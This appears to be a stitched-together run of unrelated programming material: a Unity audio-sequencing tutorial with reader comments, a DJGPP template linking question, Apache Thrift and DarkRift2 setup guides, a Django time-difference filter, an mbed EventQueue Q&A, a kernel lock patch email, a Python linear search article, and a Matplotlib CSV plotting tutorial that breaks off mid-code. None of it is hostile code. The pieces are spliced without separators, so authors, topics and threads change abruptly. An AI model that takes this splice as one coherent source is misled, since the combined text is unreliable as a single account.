        laser.pitch = UnityEngine.Random.Range(0.5f, 1.5f);
        loopStep++;
        if (loopStep >= loopCount)
        {
            laser.loop = false;
            tracker.onComplete = OnComplete;
        }
    }

    void OnComplete (AudioTracker sender)
    {
        explosion.Play();
    }
}
Audio Sequence
The music that Brennan provided isn’t a normal music track – what I mean is that he provided two different assets that are meant to be used together. There is an intro music track, followed by a loopable music track. The loopable portion should play when the intro completes, and then continue playing for as long as this scene is active. Unfortunately this creates a particular problem for Unity, because Unity is not event driven and doesn’t allow you to interact with it on a background thread.
You might consider using the AudioTracker to accomplish this task, but it isn’t the ideal solution. The actual playback of the audio can complete in-between frames and in order to continue on with the next track without any noticeable hitches we will have to use another method Unity provides instead – PlayScheduled. This handy method has the benefit of making sure that music can begin even between frames and also that it will already be loaded and ready when the time comes to begin playing. Unfortunately, it isn’t a very smart method and requires a lot of hand holding and assumptions that I had hoped to avoid. To make things trickier, an AudioSource doesn’t provide a field representing its current state, or a variety of other important bits of data (at least not that I am aware of – feel free to correct me). Here are some gotchas I encountered:
- isPlaying will return true even while it is waiting to play (because it is scheduled), but of course you won’t hear anything, nor will the time field be updated
- isPlaying will return false when it is paused and when it is stopped
- UnPause will cause a paused audiosource to set isPlaying back to true, but not a stopped audiosource
- There is no field that indicates the difference between a paused or stopped audiosource
- There is no field indicating whether an audiosource is currently scheduled to play or not
- There is nothing to tell you when a scheduled audiosource is scheduled to begin
- You can pause a scheduled audiosource, but it doesn’t delay the scheduled start time accordingly
In order to help manage all of this I created a few new classes. Create a new script called AudioSequenceData and copy the following:
using UnityEngine;
using System.Collections;

public class AudioSequenceData
{
    #region Fields & Properties
    public double startTime { get; private set; }
    public readonly AudioSource source;
    public bool isScheduled { get { return startTime > 0; } }
    public double endTime { get { return startTime + source.clip.length; } }
    #endregion

    #region Constructor
    public AudioSequenceData (AudioSource source)
    {
        this.source = source;
        startTime = -1;
    }
    #endregion

    #region Public
    public void Schedule (double time)
    {
        if (isScheduled)
            source.SetScheduledStartTime(time);
        else
            source.PlayScheduled(time);
        startTime = time;
    }

    public void Stop ()
    {
        startTime = -1;
        source.Stop();
    }
    #endregion
}
This class helps to control and track information on a single AudioSource. While Unity provided methods to schedule them, they didn’t provide a way to check when it was scheduled after the fact (again unless I missed it somewhere). Using this class, I can schedule a clip to play at a specific time, but then if I need to reschedule it, it will know it had already been scheduled and use the appropriate method to modify the schedule instead.
Next, we need something that can manage a list of these Data objects, and also manage pausing and resuming the sequence so that future scheduled clips will still play when you expect them to. Create a new script named AudioSequence and copy the following:
using UnityEngine;
using System.Collections;
using System.Collections.Generic;

public class AudioSequence : MonoBehaviour
{
    #region Enum
    private enum PlayMode
    {
        Stopped,
        Playing,
        Paused
    }
    #endregion

    #region Fields
    Dictionary<AudioClip, AudioSequenceData> playMap = new Dictionary<AudioClip, AudioSequenceData>();
    PlayMode playMode = PlayMode.Stopped;
    double pauseTime;
    #endregion

    #region Public
    public void Play (params AudioClip[] clips)
    {
        if (playMode == PlayMode.Stopped)
            playMode = PlayMode.Playing;
        else if (playMode == PlayMode.Paused)
            UnPause();

        double startTime = GetNextStartTime();
        for (int i = 0; i < clips.Length; ++i)
        {
            AudioClip clip = clips[i];
            AudioSequenceData data = GetData(clip);
            data.Schedule(startTime);
            startTime += clip.length;
        }
    }

    public void Pause ()
    {
        if (playMode != PlayMode.Playing)
            return;
        playMode = PlayMode.Paused;
        pauseTime = AudioSettings.dspTime;
        foreach (AudioSequenceData data in playMap.Values)
        {
            data.source.Pause();
        }
    }

    public void UnPause ()
    {
        if (playMode != PlayMode.Paused)
            return;
        playMode = PlayMode.Playing;
        double elapsedTime = AudioSettings.dspTime - pauseTime;
        foreach (AudioSequenceData data in playMap.Values)
        {
            if (data.isScheduled)
                data.Schedule( data.startTime + elapsedTime );
            data.source.UnPause();
        }
    }

    public void Stop ()
    {
        playMode = PlayMode.Stopped;
        foreach (AudioSequenceData data in playMap.Values)
        {
            data.Stop();
        }
    }

    public AudioSequenceData GetData (AudioClip clip)
    {
        if (!playMap.ContainsKey(clip))
        {
            AudioSource source = gameObject.AddComponent<AudioSource>();
            source.clip = clip;
            playMap[clip] = new AudioSequenceData(source);
        }
        return playMap[clip];
    }
    #endregion

    #region Private
    AudioSequenceData GetLast ()
    {
        double highestEndTime = double.MinValue;
        AudioSequenceData lastData = null;
        foreach (AudioSequenceData data in playMap.Values)
        {
            if (data.isScheduled && data.endTime > highestEndTime)
            {
                highestEndTime = data.endTime;
                lastData = data;
            }
        }
        return lastData;
    }

    double GetNextStartTime ()
    {
        AudioSequenceData lastToPlay = GetLast();
        if (lastToPlay != null && lastToPlay.endTime > AudioSettings.dspTime)
            return lastToPlay.endTime;
        else
            return AudioSettings.dspTime;
    }
    #endregion
}
At the top of this script we provided a PlayMode enum that tracks the state of the whole sequence – whether Stopped, Playing, etc. This helps overcome the lack of state information on AudioSources, and it also helps because this script manages multiple audiosources, some of which may have already completed (and therefore be stopped).

When you want to add one or more AudioClips to the sequence, just call Play and pass them along. It shouldn’t matter whether the sequence is already playing or paused; it will still add them to the end of the list and schedule them for playback accordingly.

I also provided Pause and UnPause, which offer a convenient way to temporarily stop playback of an audiosource. This won’t stop a scheduled playback, but it will reschedule the playback when you resume playing so that each track will play one after the other.
If you want to stop playback, including the scheduling of playback, you can use the Stop method.
You can get the AudioSequenceData for any clip by using the GetData method. This can let you know whether or not a clip is scheduled to play, and when it should start and stop playing. For the most part you probably won’t need this, but it’s there for special cases.
The private method GetLast returns the audio source that has the latest end time. It will be used to figure out the new start time of a clip which you would want to play at the end of the sequence.

The private method GetNextStartTime will return the endTime of the last audio clip in the list if there is one – but it is possible that that endTime has already passed. To be safe, the method will return only values that are greater than or equal to the current AudioSettings.dspTime value, so that new calls to play will start now or in the future.
Music Player
Now that we have a way to seamlessly play two (or more) music tracks together, I wanted to create a simple component that could automatically play music just like Brennan provided it. Using this script, it should be about as easy to setup your music as it would have been if it were a single file. Add a new script called MusicPlayer and copy the following:
using UnityEngine;
using System.Collections;

public class MusicPlayer : MonoBehaviour
{
    public AudioClip introClip;
    public AudioClip loopClip;
    public AudioSequence sequence { get; private set; }

    void Start ()
    {
        sequence = gameObject.AddComponent<AudioSequence>();
        sequence.Play(introClip, loopClip);
        AudioSequenceData data = sequence.GetData(loopClip);
        data.source.loop = true;
    }
}
Now we just need to incorporate this script and the music assets into our game:
- Import the music into your project.
- Set the “Load Type” for both assets to be Streaming. This will help keep memory requirements lower and is a good idea for all music.
- Open the Battle scene.
- Add a child game object to the Battle Controller called Music.
- Add the MusicPlayer component to the Music game object.
- In the inspector, assign the Intro Clip to use the Strategy RPG Battle_Intro asset.
- In the inspector, assign the Loop Clip to use the Strategy RPG Battle_Loop asset.
- Press play and enjoy the new music!
Extra
As a side note, if you use an audio mixer (new in Unity 5), you can globally adjust the volume or audio effects of any audio source that uses it. This setup requires little more than an exposed parameter and a UI script on your canvas to modify it – be sure to check out Unity’s nice video tutorials that show how. This solves most if not all of my other needs for an Audio Controller such as knowing when to mute or change volume for music and or sound fx.
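For reference, a minimal sketch of driving an exposed mixer parameter from a UI slider; the parameter name “MasterVolume” is an assumption and must match whatever you exposed in your own mixer:

using UnityEngine;
using UnityEngine.Audio;

public class VolumeControl : MonoBehaviour
{
    // Assign your mixer in the inspector; expose a "MasterVolume" parameter on it.
    [SerializeField] AudioMixer mixer;

    // Hook this up to a UI Slider's OnValueChanged (slider range 0.0001 - 1).
    public void SetVolume (float sliderValue)
    {
        // Convert the linear slider value to decibels for the mixer.
        mixer.SetFloat("MasterVolume", Mathf.Log10(sliderValue) * 20f);
    }
}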
Summary
In this post we provided several reusable components related to audio, and music in particular. First we created a new Tweener to allow us to programmatically fade music in or out using any specified volume, duration and animation curve we desire. Then we created a script which tracked the playback of an audio source via a coroutine so that you could get callbacks for audio-based events like when it begins playing, stops playing, loops or completes. Finally we created a system that allows us to play a sequence of audioclips without any gaps – perfect for playing the new music assets that we added to the project.
All of these scripts are “fresh” (read as “not battle tested” or “use at your own risk”) but should provide a helpful starting point at a minimum. If you find any bugs let me know and I’ll attempt to fix it.
Don’t forget that the project repository is available online here. If you ever have any trouble getting something to compile, or need an asset, feel free to use this resource.
10 thoughts on “Tactics RPG Music”
Followed everything to the point, and everything seems like it should be working, however, I come across two problems when starting the battle scene. I get two errors. One is
NullReferenceException: Object reference not set to an instance of an object
UnitFactory.AddJob (UnityEngine.GameObject obj, System.String name) (at Assets/Scripts/Factory/UnitFactory.cs:65)
The other error I get is:
No Prefab for name: Jobs/Warrior
UnityEngine.Debug:LogError(Object)
Any idea where I went wrong? I am at the end of the tutorial and everything seems like it should be great, but I can't figure this out.
Have you completed the step to use the file menu and choose “Pre Production->Parse Jobs”?
Oh man, I’ve been following all of this project for the past month.
At times it has been hard to digest; since I am not entirely a programmer, it was sometimes hard for me to understand at first why things were being done a certain way with regard to design patterns and architecture.
But things are okay now, and I have understood in general how things are structured so that I can modify it further.
I want to thank you so much for this, these tutorials have a lot of value for me.
I had wanted to make a tactics game for a long time, and your work helped me have this basis of tools to focus on the design and the particular implementation details of the game I want to make.
Thanks a lot.
Awesome, glad to hear you stuck to it and made it through ok! Good luck on your game!
Thank you so much for this great tutorial! Can I ask a stupid question at this point (this is the first tutorial I learned about Unity)?
Right now, all we learned is in one scene. If we want to create a game with multiple levels, do we create an independent scene for each level? For example, after finish the battle of the first level in one scene, we enter the second scene for the second level. If yes, how do we transfer from one scene to another? Could you please recommend a tutorial?
Thank you again!
Wow, I’m impressed that you made it through my Tactics RPG series as your first tutorial 🙂
You are correct that many games will use scenes to change levels. You will use the SceneManager for this purpose, so you can read the documentation at that link or google search that name and you will find some tutorials pretty quick.
Is there a download link to try out the full game and not just the demo?
I made this project as a hobbyist, for fun, and as a learning exercise for myself and my readers. Making a full Tactics RPG would require more than I can do by myself – the art requirements alone are daunting, not to mention the rest of the programming, music and sound fx, story writing, game design, marketing, etc. I never turned this project into a full game, I was satisfied feeling like I had an “engine” for one. Of course, the project was inspired by “Final Fantasy Tactics”, so feel free to play any of those if you want more!
Ah okay, I understand. It was fun following through the tutorial so I just wanted to know if you made it an actual app, etc. If you wanted to change the stats of the jobs (for example, HP from 32 to 1000), would you just change the JobStats.csv, or would I have to call a separate method like SetValue each time I wanted to change the stats?
I'm glad you enjoyed it! Regarding the stats, it depends on what you are trying to accomplish. Setting stats via the csv was meant to provide an easy way to design/balance the game – you update your stats here because you can see them all in a table, so you can easily compare and tweak to your heart's content. If you wanted to design the base values of characters to have a much larger HP range, then you could do that here.
After the game has been configured, I might use in-game code for extra variance, special conditions, or to modify stats as gameplay progresses. Does that help?
I've written hundreds of projects inside of the Borland and Turbo C IDEs and have never encountered this problem.
I'm trying to write a small game in DJGPP. I have several source files that I'm including in my project. They are not libraries yet, they are pure source - this allows me to modify them easily during development.
Here is my problem.
Project window looks like this:

- svga.cpp
- test.cpp (the test file - see below)
- keyboard.cpp

Here is the test file:

#include "svga.h"

int main(void)
{
    SVGASys<COLOR16> Video;
    Video.SetMode(0x111);
    return 0;
}
COLOR16 is typedef'd as unsigned short.
This template class allows me to use the same class for all video modes and all bit depths.
DJGPP tells me that SVGASys<unsigned short>::SetMode() is an undefined reference. But this is hogwash because it is declared in the svga.h header file and it is defined in the svga.cpp file which is part of my project.
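(For reference, one common workaround for this kind of template pitfall is an explicit instantiation at the end of svga.cpp; this is only a sketch, assuming the member definitions live in that file.)

// at the very end of svga.cpp, after all SVGASys member definitions;
// this forces the compiler to emit code for the specialization
// that the linker is looking for
template class SVGASys<unsigned short>;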
What is odd is that I'm also including my keyboard handler source code. For some reason, this code works and does not give me an undefined reference:
#include "keyboard.h"
#include "svga.h"

int main(void)
{
    StartKeyboard();
    StopKeyboard();
    return 0;
}

This works. So DJGPP is finding StartKeyboard in keyboard.h and is also linking with keyboard.cpp to create the final thing.
My question. Why on God's green earth does the first one not work but the second one does?
Incidentally, if I place the main() inside of svga.cpp to test out the functions (outside of the project), it works perfectly. But this seems to only work outside of a project and only on single-file programs.
Theoretically if it is not linking right, then neither the keyboard example nor the SVGA example should work since the linker would not be able to find either source file. Something is seriously wrong because the keyboard example works, but the SVGA one does not. But like I said, I know my template class works because it will work when I place main() inside of the svga.cpp file.
I've tried to delete all of the .o files relating to this project and still no go. This is probably the same reason that RHIDE gives me the same error when trying to call a function in a NASM source file that is in the project.
All these files are in the DJGPP directory, but I've also tried it by creating a project in another directory. Neither method works.
Our server will be implemented in the Python language. In this section, we will go through the script line by line, explaining each as we go along; you can type it in the file or download it from the repository.
So, let's open the MyToolboxServer.py file and go through its contents.
At the beginning, we need to import files that are necessary for the script to run:
import sys, glob

# path for files generated by the Apache Thrift compiler
sys.path.append('gen-py')

# add path where built Apache Thrift libraries are
sys.path.insert(0, glob.glob('thrift-0.9.2/lib/py/build/lib.*')[0])
These are the modules in the gen-py directory and the thrift-0.9.2 directory (the name depends on the exact Apache Thrift version you use).
Reminder: You can find all the DarkRift2-related articles here
You can find the entire project on my official GitHub
This article deals with the client implementation within Unity 3D. Here are the steps we'll accomplish:
- Create the client scene
- Create the DarkRift2 client game object
- Load the main game scene
- Try to connect to the server (built in the last article)
Create the client scene
Open the project and create a new scene called "MainClientScene". As for the server, we can delete the camera because the camera is contained in the MainGameScene.
Create a new GameObject "ClientManager" in the hierarchy:

Add a new component, Client, which is the official DarkRift2 client:
The DarkRift2 Client
By adding the component to the GameObject, you will see that there are a lot of properties. Let's talk about them:
- Address: IP address of the DarkRift2 server (127.0.0.1 is the loopback address, which references the current machine)
- Port: Port number of the server
- IPVersion: You can choose between IPv4 or IPv6
- InvokeFromDispatcher: As you know, there is a dispatcher. You can invoke from it
- SniffData: Prints all messages to the console
- Cache: Some settings to adjust for the cache system
For the tutorial, we can leave it like that, because the server we ran in the last article had this address: 127.0.0.1:4296
Create a custom ClientManager
As for the server again, we'll create a new script in the Network folder called ClientManager. It will handle our game's logic regarding the client (what to do on connection, disconnection, ...).
Create the ClientManager and add it to the GameObject ClientManager. For now, we just need a reference to the Client (DarkRift2).
First of all, you need to download my Utilities in order to use the script MonoBehaviourSingletonPersistent, which, when inherited, implements the Singleton pattern. Persistent means that it doesn't get destroyed on load.
Here is the link :
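(The original link is not preserved in this copy. As a rough sketch, a persistent MonoBehaviour singleton of this kind usually looks something like the following; the author's actual implementation may differ.)

using UnityEngine;

// Illustrative sketch only; the real MonoBehaviourSingletonPersistent may differ.
public class MonoBehaviourSingletonPersistent<T> : MonoBehaviour where T : Component
{
    public static T Instance { get; private set; }

    public virtual void Awake ()
    {
        if (Instance == null)
        {
            Instance = this as T;
            DontDestroyOnLoad(gameObject); // persist across scene loads
        }
        else
        {
            Destroy(gameObject); // enforce a single instance
        }
    }
}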
Then, you can write the following code for the ClientManager:
using DarkRift.Client.Unity;
using UnityEngine;
using UnityEngine.SceneManagement;

public class ClientManager : MonoBehaviourSingletonPersistent<ClientManager>
{
    #region Properties

    /// <summary>
    /// Reference to the DarkRift2 client
    /// </summary>
    public UnityClient clientReference;

    #endregion

    #region Unity Callbacks

    private void Awake()
    {
        base.Awake();

        //////////////////
        /// Properties initialization
        clientReference = GetComponent<UnityClient>();
    }

    // Start is called before the first frame update
    void Start ()
    {
        //////////////////
        /// Load the game scene
        SceneManager.LoadScene("MainGameScene", LoadSceneMode.Additive);
    }

    #endregion
}
Don't forget to use the DarkRift.Client.Unity namespace!
Try the client connection
All is ready to be tested. Do you think we can launch the client right now? Maybe... let's try:
Seems to work. The MainGameScene is correctly loaded, but if you look at the console window, you will notice that there is an error. The client cannot connect to the server.
This error occurs only if the server is unreachable. In my case (and maybe yours), I didn't launch the server before launching the client. Of course, it's basic: if the client needs to connect to the server, the server must be running before the client tries to connect.
Start the server with the build we made in the last article and try to restart the client.
We did it right. The client succeeded in connecting to the server. And if you go back to the server's console window, you will notice that the server displayed a message:
Yes, it informs you that a new client has connected! Perfect, isn't it? But wait... is the ball synchronized?
Of course not! We've just handled the client connection. We haven't sent any message to the client about the ball position, and the client doesn't know how to read messages from the server yet.
What's next?
In the next article, we'll explain how we can synchronize objects of the MainGameScene and how we will do it... a lot of work is waiting for us, but we are on the right track!
Thanks for reading.
django.contrib.humanize is a set of Django template filters that adds a human touch to data. It provides the naturalday filter, which formats dates as 'yesterday', 'today' or 'tomorrow' when applicable.
A similar requirement, which the humanize package does not address, is displaying a time difference with this human touch, so here is a snippet that does so.
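(The original snippet is not preserved in this copy of the post; based on the updated version in the first comment below, it looked roughly like the following, with MOMENT being a threshold constant in seconds whose original value is not preserved.)

from datetime import datetime

MOMENT = 120  # assumed threshold in seconds; the original value is not preserved

def naturalTimeDifference(value):
    """
    Finds the difference between the datetime value given and now()
    and returns an appropriate humanized form
    """
    delta = datetime.now() - value
    if delta.days > 6:
        return value.strftime("%b %d")                    # May 15
    if delta.days > 1:
        return value.strftime("%A")                       # Wednesday
    elif delta.days == 1:
        return 'yesterday'
    elif delta.seconds >= 3600:
        return str(delta.seconds / 3600) + ' hours ago'   # 3 hours ago
    elif delta.seconds > MOMENT:
        return str(delta.seconds / 60) + ' minutes ago'   # 29 minutes ago
    else:
        return 'a moment ago'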
2 thoughts on “Humanizing the time difference ( in django )”
Hi Anand,
Thanks for sharing naturalTimeDifference(). I made two changes to improve your code; feel free to share with others. First, if the filter is passed a datetime.timedelta object, it uses that instead of calculating datetime.now() - value. Second, with one additional conditional it now says '1 hour ago' for (7200 > delta.seconds >= 3600) and 'N hours ago' for delta.seconds >= 7200. Small changes for a grammatically correct result.
Here is the updated filter code:
def naturalTimeDifference(value):
    """
    Finds the difference between the datetime value given and now()
    and returns appropriate humanize form
    """
    from datetime import datetime, timedelta
    if isinstance(value, timedelta):
        delta = value
    elif isinstance(value, datetime):
        delta = datetime.now() - value
    else:
        delta = None
    if delta:
        if delta.days > 6:
            return value.strftime("%b %d")                   # May 15
        if delta.days > 1:
            return value.strftime("%A")                      # Wednesday
        elif delta.days == 1:
            return 'yesterday'                               # yesterday
        elif delta.seconds >= 7200:
            return str(delta.seconds / 3600) + ' hours ago'  # 3 hours ago
        elif delta.seconds >= 3600:
            return '1 hour ago'                              # 1 hour ago
        elif delta.seconds > MOMENT:
            return str(delta.seconds / 60) + ' minutes ago'  # 29 minutes ago
        else:
            return 'a moment ago'                            # a moment ago
        return defaultfilters.date(value)
    else:
        return str(value)
Hi, now with Django 1.4 and time zone support you need to replace
datetime.utcnow() - value
with
delta = timezone.now() - value
where ‘timezone’ is imported with
from django.utils import timezone
2 years, 3 months ago.
How to end an event queue?
I would like to create an event queue, and then call a function ever 2 seconds for a total of 10 seconds (so likely 5 times), and then for the queue to stop executing the function. So a temporary event, but called every certain amount of time. I've tried this:
void handler(int c)
{
    com.printf("Param: %d\r\n", c);
}

int main()
{
    EventQueue queue;
    int id = queue.call_every(2000, handler, 5);
    queue.dispatch();
    wait(10);
    queue.break_dispatch();
    queue.cancel(id);
    while (1) {
    }
}
But the function doesn't stop executing.
How can I stop the function from executing after some time x?
2 Answers
2 years, 3 months ago.
Hi there,
from my point of view, your code is not working because after you call the dispatch method without an argument, your code is blocked in an indefinite loop.
Dispatch
void handler(int c)
{
    printf("Param: %d\r\n", c);
}

int main()
{
    printf("Start\n");
    EventQueue queue;
    int id = queue.call_every(2000, handler, 5);
    queue.dispatch(10000);
    while (1) {
        myled = !myled;
        wait(0.5);
    }
}
I do not know if these ways are correct, but the function will stop/pause.
Cancel
void handler(int c)
{
    printf("Param: %d\r\n", c);
}

int main()
{
    printf("Start\n");
    EventQueue queue;
    Thread t;
    t.start(callback(&queue, &EventQueue::dispatch_forever));
    int id = queue.call_every(2000, handler, 5);
    wait(10);
    queue.cancel(id);
    while (1) {
        myled = !myled;
        wait(0.5);
    }
}
Pause
#include "mbed.h"

DigitalOut myled(LED1);
EventQueue queue;
Thread t;
InterruptIn mybutton(USER_BUTTON);
volatile bool ispressed = true;

void pressed()
{
    ispressed = !ispressed;
}

void handler(int c)
{
    if (ispressed == true) {
        printf("Param: %d\r\n", c);
    }
}

int main()
{
    printf("Start\n");
    mybutton.rise(callback(pressed));
    t.start(callback(&queue, &EventQueue::dispatch_forever));
    int id = queue.call_every(2000, handler, 5);
    while (1) {
        myled = !myled;
        wait(0.5);
    }
}
and so on.
Best regards
J.
2 years, 3 months ago.
Instead of queue.call_every(), use queue.call_in(), which schedules it just one time. Then reschedule it as many times as you want, and stop when needed. The function can even schedule itself if it has access to the EventQueue object.
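(A minimal sketch of that self-rescheduling approach, assuming the mbed OS 5 EventQueue API; the limit of 5 calls mirrors the question.)

#include "mbed.h"

EventQueue queue;
int count = 0;

void handler() {
    printf("Call %d\r\n", count);
    if (++count < 5) {
        queue.call_in(2000, handler); // reschedule ourselves in 2 seconds
    }
    // after the 5th call we simply stop rescheduling
}

int main() {
    queue.call_in(2000, handler);  // schedule the first call
    queue.dispatch_forever();      // block and process events
}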
On Wed, 2006-08-02 at 17:41 -0400, Sven Willenberger wrote:
> On Wed, 2006-08-02 at 10:25 -0700, Matthew Dillon wrote:
> > Please try this patch and tell me if it works. I think we have an issue
> > when one process holds an exclusive lock while 2 or more processes are
> > trying to get a shared lock, or vise-versa.
> >
> > -Matt
> >
> > Index: kern_lockf.c
> > ===================================================================
> > RCS file: /cvs/src/sys/kern/kern_lockf.c,v
> > retrieving revision 1.32
> > diff -u -r1.32 kern_lockf.c
> > --- kern_lockf.c 25 Jul 2006 20:01:50 -0000 1.32
> > +++ kern_lockf.c 2 Aug 2006 17:23:56 -0000
> > @@ -772,8 +772,10 @@
> >  		TAILQ_REMOVE(&lock->lf_blocked, range, lf_link);
> >  		range->lf_flags = 1;
> >  		wakeup(range);
> > +#if 0
> >  		if (range->lf_start >= start && range->lf_end <= end)
> >  			break;
> > +#endif
> >  	}
> >  }
>
> I have applied the patch (and recompiled) and am letting the system run
> full steam right now (including the milter, etc); the initial results
> look promising as it has not exhibited the aberrant behavior as of yet.
> I will post a followup after letting this run all night (assuming it
> does so) or after it fails (which hopefully won't happen).
>
> Sven

As a followup, the server has been running without a hitch now for 18 hours, so it would appear that the above patch has fixed the situation, unless some other more rare situation/condition crops up that would cause this lock.

Sven
A simple solution to sequence search problems is the linear search algorithm, also known as the sequential search algorithm. In this article, I will tell you how to create a linear search algorithm with Python.
How Linear Search Algorithm Works?
The linear search algorithm iterates through the sequence one item at a time until the specific item is found or all items have been examined. In Python, a target element can be found in a sequence using the in operator:
Also, Read – Proximity Analysis with Python.
if key in theArray:
    print("The key is in the array.")
else:
    print("The key is not in the array.")
Using the in operator makes our code simple and easy to read, but it hides the inner workings. Below, the in operator is implemented as a linear search.
Consider the unsorted 1-D array of integer values shown in the figure above. To determine if the value 31 is in the array, the search begins with the value of the first element. Since the first element does not contain the target value, the next element in sequential order is compared to the value 31. This process is repeated until the element is found in the sixth position.
But, what if the desired item is not in the array? For example, suppose we want to find the value 8 in the example table. The search begins at the first entry as before, but this time each element in the array is compared to the target value. It cannot be determined that the value is not in sequence until the entire array has been traversed, as shown in the figure above.
Finding a Specific Item using Linear Search Algorithm
The function in the figure above implements the linear search algorithm, which results in a Boolean value indicating the success or failure of the search. This is the same operation performed by the in operator.
A count-controlled loop is used to cycle through the sequence in which each element is compared to the target value. If the element is in the sequence, the loop is terminated and True is returned. Otherwise, a full scan is taken and False is returned after the loop ends.
Searching on an Unsorted Sequence:
def linearSearch(theValues, target):
    n = len(theValues)
    for i in range(n):
        # if the target is in the ith element, return True
        if theValues[i] == target:
            return True
    return False
To analyze the linear search algorithm for the worst case, we must first determine which conditions constitute the worst case. Remember that the worst-case happens when the algorithm performs the maximum number of steps.
For a linear search, this happens when the target element is not in the sequence and the loop iterates through the entire sequence. Assuming the sequence contains n elements, the linear search has a worst-case time of O(n).
Searching on a Sorted Sequence
A linear search algorithm can also be performed on a sorted sequence, which is a sequence containing values in a specific order. A linear search algorithm on a sorted sequence works in the same way it does for an unsorted sequence, with only one exception. It is possible to terminate the search prematurely when the value is not in the sequence instead of always having to perform a full scan.
def sortedLinearSearch(theValues, item):
    n = len(theValues)
    for i in range(n):
        # if the target is found in the ith element, return True
        if theValues[i] == item:
            return True
        # if target is larger than the ith item, it's not in the sequence
        elif theValues[i] > item:
            return False
    return False
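For a quick sanity check, both functions can be exercised like this (the values are arbitrary):

values = [2, 7, 15, 31, 40, 51]

print(linearSearch(values, 31))         # True
print(linearSearch(values, 8))          # False

# sortedLinearSearch assumes the sequence is already sorted
print(sortedLinearSearch(values, 40))   # True
print(sortedLinearSearch(values, 8))    # False (stops early at 15)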
So this is how we can implement a linear search with Python. It is a part of Data Structures and Algorithms, which is one of the most important topics in any field of programming.
Also, Read – Interactive Maps with Python.
I hope you liked this article on Linear Search Algorithm with Python. Feel free to ask your valuable questions in the comments section below. You can also follow me on Medium to learn every topic of Python and Machine Learning.
Plotting data from a CSV file
A common format to export and distribute datasets is the Comma-Separated Values (CSV) format. For example, spreadsheet applications allow us to export a CSV from a working sheet, and some databases also allow for CSV data export. Additionally, it's a common format to distribute datasets on the Web.
In this example, we'll be plotting the evolution of the world's population divided by continents, between 1950 and 2050 (of course they are predictions), using a new type of graph: bars stacked.
Using the data available online (which in turn draws on the official UN data), we have prepared the following CSV file:
Continent,1950,1975,2000,2010,2025,2050
Africa,227270,418765,819462,1033043,1400184,1998466
Asia,1402887,2379374,3698296,4166741,4772523,5231485
Europe,547460,676207,726568,732759,729264,691048
Latin America,167307,323323,521228,588649,669533,729184
Northern America,171615,242360,318654,351659,397522,448464
Oceania,12807,21286,31160,35838,42507,51338
In the first line, we can find the header with a description of what the data in the columns represent. The other lines contain the continent's name and its population (in thousands) for the given years.
There are several ways to parse a CSV file, for example:
- NumPy's loadtxt() (what we are going to use here)
- Matplotlib's mlab.csv2rec()
- The csv module (in the standard library)
but we decided to go with loadtxt() because it's very powerful (and it's what Matplotlib is standardizing on).
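(For comparison, a rough sketch of parsing the same file with the standard csv module; it takes more manual work than loadtxt():)

import csv

with open('population.csv') as f:
    reader = csv.reader(f)
    years = [int(y) for y in next(reader)[1:]]   # header row: skip the label column
    continents, data = [], []
    for row in reader:
        continents.append(row[0])
        data.append([int(v) for v in row[1:]])   # population values per year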
Let's look at how we can plot it then:
# for file opening made easier
from __future__ import with_statement
We need this because we will use the with statement to read the file.
# numpy
import numpy as np
NumPy is used to load the CSV and for its useful array data type.
# matplotlib plotting module
import matplotlib.pyplot as plt
# matplotlib colormap module
import matplotlib.cm as cm
# needed for formatting Y axis
from matplotlib.ticker import FuncFormatter
# Matplotlib font manager
import matplotlib.font_manager as font_manager
In addition to the classic pyplot module, we need other Matplotlib submodules:
- cm (color map): Considering the way we're going to prepare the plot, we need to specify the color map of the graphical elements
- FuncFormatter: We will use this to change the way the Y-axis labels are displayed
- font_manager: We want to have a legend with a smaller font, and font_manager allows us to do that
def billions(x, pos):
    """Formatter for Y axis, values are in billions"""
    return '%1.fbn' % (x*1e-6)
This is the function that we will use to format the Y-axis labels. Our data is in thousands. Therefore, by dividing it by one million, we obtain values in the order of billions. The function is called at every label to draw, passing the label value and the position.
# bar width
width = .8
As said earlier, we will plot bars, and here we define their width.
The following is the parsing code. We know that it's a bit hard to follow (the data preparation code is usually the hardest one) but we will show how powerful it is.
# open CSV file
with open('population.csv') as f:
The function we're going to use, NumPy loadtxt(), is able to receive either a filename or a file descriptor, as in this case. We have to open the file here because we have to strip the header line from the rest of the file and set up the data parsing structures.
# read the first line, splitting the years
years = map(int, f.readline().split(',')[1:])
Here we read the first line, the header, and extract the years. We do that by calling the split() function and then mapping the int() function to the resulting list, from the second element onwards (as the first one is a string).
# we prepare the dtype for exacting data; it's made of:
# <1 string field> <len(years) integers fields>
dtype = [('continents', 'S16')] + [('', np.int32)]*len(years)
NumPy is flexible enough to allow us to define new data types. Here, we are creating one ad hoc for our data lines: a string (of maximum 16 characters) and as many integers as the length of the years list. Also note how the first element has a name, continents, while the last integers have none: we will need this in a bit.
# we load the file, setting the delimiter and the dtype above
y = np.loadtxt(f, delimiter=',', dtype=dtype)
With the new data type, we can actually call loadtxt(). Here is the description of the parameters:
- f: This is the file descriptor. Please note that it now contains all the lines except the first one (we've read above) which contains the headers, so no data is lost.
- delimiter: By default, loadtxt() expects the delimiter to be spaces, but since we are parsing a CSV file, the separator is comma.
- dtype: This is the data type that is applied to the text we read. By default, loadtxt() tries to match against float values.
# "map" the resulting structure to be easily accessible:
# the first column (made of string) is called 'continents'
# the remaining values are added to 'data' sub-matrix
# where the real data are
y = y.view(np.dtype([('continents', 'S16'),
('data', np.int32, len(years))]))
Here we're using a trick: we view the resulting data structure as made up of two parts, continents and data. It's similar to the dtype that we defined earlier, but with an important difference. Now, the integer values are mapped to a field name, data. This results in the column continents with all the continent names, and the matrix data that contains the years' values for each row of the file.
data = y['data']
continents = y['continents']
We can separate the data and the continents part into two variables for easier usage in the code.
# prepare the bottom array
bottom = np.zeros(len(years))
We prepare an array of zeros of the same length as years. As said earlier, we plot stacked bars, so each dataset is plot over the previous ones, thus we need to know where the bars below finish. The bottom array keeps track of this, containing the height of bars already plotted.
# for each line in data
for i in range(len(data)):
Now that we have our information in data, we can loop over it.
# create the bars for each element, on top of the previous bars
bt = plt.bar(range(len(data[i])), data[i], width=width,
color=cm.hsv(32*i), label=continents[i],
bottom=bottom)
and create the stacked bars. Some important notes:
- We select the i-th row of data, and plot a bar according to its element's size (data[i]) with the chosen width.
- As the bars are generated in different loops, their colors would be all the same. To avoid this, we use a color map (in this case hsv), selecting a different color at each iteration, so the sub-bars will have different colors.
- We label each bar set with the corresponding continent's name (useful for the legend)
- As we have said, they are stacked bars. In fact, every iteration adds a piece of the global bars. To do so, we need to know where to start drawing the bar from (the lower limit), and bottom does this. It contains the value where to start drawing the current bar.
# update the bottom array
